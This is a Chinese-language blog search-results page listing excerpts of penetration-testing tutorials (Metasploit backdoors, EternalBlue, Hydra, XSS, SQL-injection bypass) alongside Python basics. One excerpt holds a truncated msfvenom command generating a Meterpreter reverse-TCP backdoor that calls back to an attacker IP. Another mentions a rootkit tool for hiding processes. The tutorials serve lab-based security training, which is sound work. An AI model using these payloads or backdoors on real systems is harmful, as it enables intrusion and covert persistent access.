搜索[\\'"],共找到15个文章
Metasploit实例-无文件后门(十)|leon的博客

Metasploit实例-无文件后门(十)

1.1.1 使用脚本创建无文件后门 1.1.1.1 下载Vegile程序 Vegile是用于linux系统渗透测试中的权限维持。Vegile 这个工具将设置一个后门/rootkit, 并且这个后门会直接隐藏进程,无限连接metesploit...
Metasploit实例-永恒之蓝漏洞(六)|leon的博客

Metasploit实例-永恒之蓝漏洞(六)

1.1.1 攻击Win7系统永恒之蓝漏洞(ms17-010) 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers (影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows...
Metasploit后门渗透(三)|leon的博客

Metasploit后门渗透(三)

1.1 后门制作 1.1.1 使用编码器生成后门 1.1.1.1 使用一个编码器生成后门 [cce lang='bash']# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.180 L...
渗透提权-Tripwire检查系统完整性(二)|leon的博客

渗透提权-Tripwire检查系统完整性(二)

1.1 实验环境 序号 主机IP 主机系统 主机角色 1 192.168.10.180 Kali 攻击机 2 192.168.205.132 Centos 7.0 64位 被攻击机 1.2 Tripwire介绍 Tripwire是目前最为著名的unix下文件系统完整性检查...
Leon的博客的头像|leon的博客Leon的博客2年前
1100
暴力破解-hydra(二)|leon的博客

暴力破解-hydra(二)

1.1 hydra介绍 Hydra对应的英文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP 等服务,支持Linux、Windows、 Mac平台安装,其中Kali Li...
XSS漏洞-手动挖掘(五)|leon的博客

XSS漏洞-手动挖掘(五)

1.1 Stage 13 CSS的IE特性伪协议注入XSS https://xss-quiz.int21h.jp/stage13_0.php?sid=1c9c607c40dc4863f84fe2bd8218c7ba4664721e 1.1.1 页面分析 1.1.1.1 分析过程 提示信息:样式属性 页面...
Leon的博客的头像|leon的博客Leon的博客2年前
2390
SQL注入-SQL注入绕过技术|leon的博客

SQL注入-SQL注入绕过技术

1.1 大小写绕过 如果过滤器通过关键字进行过滤并没有识别大小写,我们就可以使用大小写来进行绕过,因为SQL语句是不区分大小写的。 原始语句:SELECT * FROM users WHERE id='1' LIMIT 0,1 大小...
Python并发编程-进程|leon的博客

Python并发编程-进程

第1章 进程介绍 1.1 进程概念 进程(Process)是计算机中的程序关于某数据集合上的一次运行活动,是系统进行资源分配和调度的基本单位,是操作系统结构的基础。在早期面向进程设计的计算机结构...
Leon的博客的头像|leon的博客Leon的博客6年前
7800
Python基础-常用模块|leon的博客

Python基础-常用模块

第1章 模块介绍 1.1 模块的定义 一个模块就是一个包含了python定义和声明的文件,文件名就是模块名字加上.py的后缀。 1.2 模块的类别 使用python编写的代码(.py文件); 已被编译为共享库或DLL...
Leon的博客的头像|leon的博客Leon的博客6年前
8110
Python基础-python开发基础|leon的博客

Python基础-python开发基础

第1章 用户交互 1.1 input Tips: input接收的所有输入默认都是字符串格式. 1.1.1 用户输入单个信息 [cce lang='bash']#!/usr/bin/env python # -*- coding: utf-8 -*- # 将用户输入的内容赋值给...

运行时间

用户总数

浏览总数

文章总数

您的 IP 地址是

今天是
emo